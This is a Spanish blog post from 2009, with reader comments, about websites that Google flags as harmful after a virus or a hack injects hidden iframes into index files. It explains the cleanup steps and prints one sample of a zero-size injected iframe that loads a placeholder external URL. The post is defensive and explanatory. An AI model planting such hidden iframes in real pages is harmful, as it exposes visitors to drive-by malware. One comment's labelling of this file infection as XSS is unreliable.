Si tienes un sitio web señalado como un sitio que puede afectar el equipo del usuario que lo visite (como la imagen de abajo) y no sabes por qué pasó, seguro pensarás:
"WTF?!?! pero si mi sitio no es para descargar software malicioso o__O ."
Esto es debido a que tu PC esta infectada con algún virus y al subir algún archivo vía FTP a tu servidor subiste una copia del virus. O que alguna aplicación web que tengas instalada en tu servidor tenía un hueco de seguridad y fuiste hackeado.
Al estar el virus en tu servidor lo que hace es insertar código html en todos los archivos index y home de cualquier extensión entre las etiquetas <body> y </body>, normalmente agrega un iframe y llamar una pagina que se encuentra en otro servidor.
Por ejemplo:
Código :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ejemplo</title> </head> <body> <iframe frameborder="0" onload="if (!this.src){ this.src='URL externo'; this.height='0'; this.width='0';}">qfmhtowbkedyblfscqtlcmxickfnrxm</iframe> </body> </html>
Cuando Google detecta este tipo de ataque en tu sitio lo que hace es colocar en el resultado de cada búsqueda en donde aparezca tu sitio el texto "Este sitio puede dañar tu equipo" debajo del link. Si el usuario ignora el mensaje Google mostrara de nuevo un mensaje informado que el sitio al que intenta entrar puede dañar su equipo si da click al link desde el resultado de la búsqueda.
Si entras directamente colocando el dominio del sitio en tu navegador Firefox, Chrome o Safari te mostrará un mensaje diciendo que el sitio es peligroso y te preguntaran si quieres continuar.
En caso que te suceda esto a continuación unos pasos a seguir para solventar este problema:
- Bajar todos los archivos del servidor y luego eliminar todo el contenido en el servidor. Si estas en Windows lo mas probables es que al descargar los archivos infectados tu antivirus los detecte e intente eliminarlos.
- Cambiar el password del usuario FTP que utilizas para conectarte al servidor.
- Revisar todos los archivos index o home (html, php, etc) en busca de algún iframe que no haya sido colocado por ti.
- Subir el sitio de nuevo.
- Ir al sitio de Webmaster Tools de Google agregar tu sitio si aun no lo has hecho, y solicitar la reevaluación de tu sitio web.
El tiempo máximo que he esperado es de 24 horas luego de limpiar el sitio y enviarle la notificación a Google pero podría ser menos.
¿Sabes SQL? ¿No-SQL? Aprende MySQL, PostgreSQL, MongoDB, Redis y más con el Curso Profesional de Bases de Datos que empieza el martes, en vivo.
Por Azlinraeh el 10 de Noviembre de 2009
Por ur! el 10 de Noviembre de 2009
Por Fran el 10 de Noviembre de 2009
Por Fran el 10 de Noviembre de 2009
Los localicé por la fecha-hora de modificación del archivo. Todos los que habían sido modificados coincidiendo con el index donde detecté el iframe.
Saludos.
Por Dientuki el 10 de Noviembre de 2009
Por Gustavo Novaro el 10 de Noviembre de 2009
Por Siriö el 10 de Noviembre de 2009
Es un ataque llamado XSS Directo, el Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. Hay Script para evitar esto.
Por christian el 10 de Noviembre de 2009
Por Siriö el 11 de Noviembre de 2009